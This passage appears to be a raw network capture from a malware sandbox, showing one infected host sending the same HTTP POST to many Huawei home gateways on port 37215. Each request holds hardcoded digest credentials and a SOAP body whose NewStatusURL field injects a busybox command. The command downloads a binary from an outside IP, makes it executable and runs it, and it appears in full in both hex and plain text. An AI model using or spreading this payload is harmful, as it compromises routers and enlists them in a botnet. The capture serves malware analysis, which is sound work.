2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            232192.168.2.1533572197.191.61.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178518057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            233192.168.2.1535126197.173.162.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178549051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            234192.168.2.1541166197.4.134.7937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178549051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            235192.168.2.1548436197.189.169.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178566933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            236192.168.2.1558866197.1.161.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178617001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            237192.168.2.1535988197.161.243.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178643942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            238192.168.2.1539172197.38.5.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178689003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            239192.168.2.1545050197.135.89.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178699017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            240192.168.2.1555208197.139.4.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178729057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            241192.168.2.1553254197.143.128.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178736925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            242192.168.2.1534856197.204.205.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178756952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
